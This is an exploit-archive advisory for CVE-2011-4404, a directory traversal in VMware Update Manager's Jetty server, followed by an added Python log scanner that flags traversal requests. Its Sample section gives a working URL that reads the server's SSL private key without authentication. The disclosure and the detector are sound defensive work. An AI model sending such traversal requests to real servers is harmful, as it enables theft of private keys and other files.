# Exploit Title: VMware Update Manager Directory Traversal
# Author: Alexey Sintsov
# Software Link: http://www.vmware.com/
# Version: 2.0.2
# Tested on: Windows 2003 / vCenter Update Manager 4.1 U1
# CVE : CVE-2011-4404

DSECRG-11-042 VMware Update Manager - Directory Traversal

Application: VMware Update Manager
Versions Affected: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4.0 prior to Update 4
Vendor URL: http://vmware.com
Bugs: Directory Traversal File Read
CVE: CVE-2011-4404
CVSS2: 7.8
Exploits: YES
Reported: 06.06.2010
Vendor response: 06.06.2010
Date of Public Advisory: 18.11.2011
Authors: Alexey Sintsov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)

Description
********
A directory traversal vulnerability was found in the Jetty web server that is used by VMware Update Manager.

Details
*******
A directory traversal vulnerability was found in the Jetty web server that is used by VUM. With this vulnerability, an unauthenticated attacker can read any file on the server (with the rights of the process).

Sample
******
http://<target>:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key

References
**********
http://dsecrg.com/pages/vul/show.php?id=342
http://www.vmware.com/security/advisories/VMSA-2011-0014.html

Fix Information
*************
The vendor has fixed this issue:

Fixed in Update Manager 5.0 Windows not affected
Fixed in Update Manager 4.1 Windows Update 2
Fixed in Update Manager 4.0 Windows Update 4
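
A defender-side check for the request pattern shown in the Sample section, as an added example that is not part of the original advisory: it scans web access logs for requests under /vci/downloads/ whose decoded path contains a ".." segment, including backslash and percent-encoded forms. The combined-style log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: combined-style access log; adapt the regex to the real log format.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3})')
DOWNLOADS_PREFIX = "/vci/downloads/"  # path taken from the advisory's sample URL

def normalize(target: str, max_rounds: int = 3) -> str:
    """Drop the query string, percent-decode repeatedly, unify path separators."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):  # repeated decoding catches double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def is_traversal(target: str) -> bool:
    """True if a request under /vci/downloads/ contains a '..' path segment."""
    path = normalize(target).lower()
    if not path.startswith(DOWNLOADS_PREFIX):
        return False
    segments = path[len(DOWNLOADS_PREFIX):].split("/")
    return any(seg.strip() == ".." for seg in segments)

def scan(lines):
    """Return (ip, status, target) for every log line that matches."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and is_traversal(m.group("target")):
            hits.append((m.group("ip"), int(m.group("status")), m.group("target")))
    return hits

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Nov/2011:10:00:01 +0000] "GET /vci/downloads/health.xml HTTP/1.1" 200 512',
    '198.51.100.7 - - [18/Nov/2011:10:00:05 +0000] "GET /vci/downloads/.\\..\\..\\sample.txt HTTP/1.1" 200 211',
    '198.51.100.7 - - [18/Nov/2011:10:00:09 +0000] "GET /vci/downloads/%252e%252e%255csample.txt HTTP/1.1" 404 0',
    '203.0.113.4 - - [18/Nov/2011:10:00:12 +0000] "GET /vci/downloads/..notes.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, status, target in scan(SAMPLE_LOG):
        print(f"{ip} status={status} {target}")
```

A hit with status 200 indicates the file was served and deserves priority in triage; the key named in the Sample section should be treated as exposed if it appears in such a request.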